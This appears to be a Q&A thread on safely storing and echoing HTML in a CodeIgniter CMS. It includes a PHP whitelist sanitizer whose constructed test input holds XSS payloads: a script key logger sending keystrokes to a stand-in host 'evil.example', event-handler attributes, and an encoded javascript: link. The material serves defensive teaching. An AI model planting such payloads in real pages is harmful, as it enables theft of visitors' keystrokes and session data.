Reputation: 3311
I am creating a CMS with CodeIgniter and need to store some text that is wrapped in HTML. I will then get the data from the database and echo it onto my page. What is the best way to do this while being security conscious?
Example of data:
<h2>A fresh approach</h2>
<p>Whether you have queries regarding your</p>
<a href="#">cgoto page</a>
Upvotes: 2
Views: 3086
Reputation: 10512
Sanitization is always necessary.
I'm a particular fan of using whitelists for HTML tags, so you analyze the data you're about to store and simply wipe out the HTML tags that are not in that whitelist. This way, if you desire, you can prevent users from inserting certain tags like <script> or <object> with unpredictable or obscure behavior.
Suppose one of your CMS users uses a very dumb password and someone else gains access to the application. Filtering HTML content would prevent the impostor from inserting malicious cross-domain JavaScript to collect keyboard events (which might reveal possible passwords in login forms), etc.
Also, it's always good to validate the HTML you're going to store, since any invalid HTML would end up hurting your website markup and even breaking your rendering in some browsers.
Doing those checks before storing things in the database might not be enough, since data can be corrupted by direct database access, so before echoing the content do what @RodrigoFerreira said.
Upvotes: 1
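The whitelist approach described in the answer above, as an added example that is not code from the answer or from CodeIgniter: the markup is parsed with PHP's DOMDocument, only listed tags and attributes survive, tags whose body is the payload (script, style, object, ...) are removed with their content, unknown wrapper tags are unwrapped, and href values are checked for an allowed URL scheme. The class name, the tag, attribute and scheme lists, and the sample input are assumptions made for this illustration.

```php
<?php
// Added example; not code from the original answer or from CodeIgniter.
// Whitelist sanitizer for stored HTML: parse, keep listed tags/attributes,
// drop everything else. Tag, attribute and scheme lists are assumptions
// chosen for this illustration; tune them to the markup your CMS needs.

final class HtmlWhitelist
{
    // Allowed tag => attributes that may survive on it. Anything else goes.
    private const ALLOWED = [
        'h1' => [], 'h2' => [], 'h3' => [], 'p' => [], 'br' => [],
        'strong' => [], 'em' => [], 'ul' => [], 'ol' => [], 'li' => [],
        'a' => ['href', 'title'],
    ];

    // Tags whose content is itself the payload: remove element and children.
    private const DROP_WITH_CONTENT = ['script', 'style', 'object', 'embed', 'iframe', 'applet'];

    // Schemes accepted in href. javascript:, data:, vbscript: are deliberately absent.
    private const SAFE_SCHEMES = ['http', 'https', 'mailto'];

    public static function clean(string $html): string
    {
        $doc  = new DOMDocument();
        $prev = libxml_use_internal_errors(true);   // no warnings on broken markup
        // The XML prolog makes libxml read the fragment as UTF-8. loadHTML wraps it
        // in <html><body>; the <div> stops bare text being auto-wrapped in <p> and
        // is itself unwrapped below because it is not in ALLOWED.
        $doc->loadHTML('<?xml encoding="UTF-8"?><div>' . $html . '</div>');
        libxml_clear_errors();
        libxml_use_internal_errors($prev);

        $body = $doc->getElementsByTagName('body')->item(0);
        if ($body === null) {
            return '';
        }
        self::walk($body);

        $out = '';
        foreach ($body->childNodes as $child) {
            $out .= $doc->saveHTML($child);   // re-serialised from the DOM, never the raw input
        }
        return $out;
    }

    private static function walk(DOMNode $node): void
    {
        // Snapshot the children: the live list is mutated while we iterate.
        foreach (iterator_to_array($node->childNodes) as $child) {
            if ($child instanceof DOMComment) {
                $node->removeChild($child);               // comments can hide conditional markup
                continue;
            }
            if (!$child instanceof DOMElement) {
                continue;                                 // text nodes pass through as text
            }
            $tag = strtolower($child->tagName);
            if (isset(self::ALLOWED[$tag])) {
                self::filterAttributes($child, self::ALLOWED[$tag]);
                self::walk($child);
                continue;
            }
            if (in_array($tag, self::DROP_WITH_CONTENT, true)) {
                $node->removeChild($child);               // <script>...</script> goes entirely
                continue;
            }
            // Unknown but harmless wrapper (div, span, font ...): sanitise its
            // children, hoist them up, then lose the tag itself.
            self::walk($child);
            while ($child->firstChild !== null) {
                $node->insertBefore($child->firstChild, $child);
            }
            $node->removeChild($child);
        }
    }

    private static function filterAttributes(DOMElement $el, array $allowed): void
    {
        $names = [];
        foreach ($el->attributes as $attr) {
            $names[] = $attr->name;                       // collect first, then mutate
        }
        foreach ($names as $name) {
            $keep = in_array(strtolower($name), $allowed, true);   // drops onclick, style, ...
            if ($keep && strtolower($name) === 'href') {
                $keep = self::safeUrl($el->getAttribute($name));
            }
            if (!$keep) {
                $el->removeAttribute($name);
            }
        }
    }

    private static function safeUrl(string $url): bool
    {
        // libxml has already decoded entities such as &#106;avascript:. Browsers
        // ignore tabs/newlines inside a scheme, so strip control chars before checking.
        $url = preg_replace('/[\x00-\x20]+/', '', $url);
        if (!preg_match('/^([a-z][a-z0-9+.-]*):/i', $url, $m)) {
            return true;                                  // relative URL or fragment such as "#"
        }
        return in_array(strtolower($m[1]), self::SAFE_SCHEMES, true);
    }
}

// Constructed sample (not from the question): legitimate markup with an injected
// key logger, an event-handler attribute and an entity-encoded javascript: link.
$dirty = '<h2 onclick="steal()">A fresh approach</h2>'
       . '<p>Whether you have queries regarding your</p>'
       . '<a href="#">go to page</a>'
       . '<script>document.onkeypress = e => fetch("//evil.example/?k=" + e.key);</script>'
       . '<a href="javas&#99;ript:alert(1)">click</a>'
       . '<img src="x" onerror="alert(1)">';

echo HtmlWhitelist::clean($dirty), PHP_EOL;
```

By construction the script element is removed with its body, the onclick and onerror attributes are dropped, the img (not in the whitelist and with no children) disappears, and the second link keeps its text but loses the javascript: href. Run the same clean() call again on the string read back from the database before passing it to the view, which is the point made about direct database access in the answer. libxml's HTML parser is not a browser's parser, so for a production CMS prefer a maintained whitelist library such as HTML Purifier over a hand-rolled filter; the code above shows the mechanism, not a vetted implementation.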
Reputation: 366
Apply an XSS filter before saving (better, because you'll save once and echo several times) or on output, and assign the content to a variable passed to the view. You may use $this->security->xss_clean($data_retrieved).
Upvotes: 3